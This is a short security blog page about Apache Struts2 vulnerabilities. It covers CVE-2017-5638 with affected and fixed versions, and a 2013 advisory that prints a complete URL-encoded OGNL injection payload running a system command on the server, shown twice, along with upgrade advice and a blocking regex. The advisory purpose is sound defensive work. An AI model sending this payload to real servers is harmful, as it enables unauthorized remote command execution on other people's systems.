Becareful new Vulnerability Apach Struts2 (Cve-2017-5638).
How to Fix: upgrade to Struts 2.3.32 or Struts 2.5.10.1
Affected Version: Struts 2.3.5 - 2.3.31, Struts 2.5 - 2.5.10
POC:
https://github.com/tengzhangchao/Struts2_045-Poc
Showing posts with label struts2. Show all posts
Showing posts with label struts2. Show all posts
Tuesday, 7 March 2017
Friday, 19 July 2013
Apache Struts2 include Params Remote Code Execution
It be able to get system permissions, An attacker could execute commands.
http://URL/PAGE.ACTION(or .DO)?redirect:$%7B%23a%3d(new%20java.lang.ProcessBuilder(%22whoami%22)).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char%5B50000%5D,%23d.read(%23e),%23matt%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()%7D
Solution:
- Upgrade Version Struts2
- Blocking Pattern Regex
(.*)(redirect|action)(.*)java(.|%2e)lang(.|%2e)ProcessBuilder(.*)com(.|%2e)opensymphony(.*)
Reference: http://www.exploit-db.com/exploits/25980/
http://URL/PAGE.ACTION(or .DO)?redirect:$%7B%23a%3d(new%20java.lang.ProcessBuilder(%22whoami%22)).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char%5B50000%5D,%23d.read(%23e),%23matt%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()%7D
Solution:
- Upgrade Version Struts2
- Blocking Pattern Regex
(.*)(redirect|action)(.*)java(.|%2e)lang(.|%2e)ProcessBuilder(.*)com(.|%2e)opensymphony(.*)
Reference: http://www.exploit-db.com/exploits/25980/
Subscribe to:
Comments (Atom)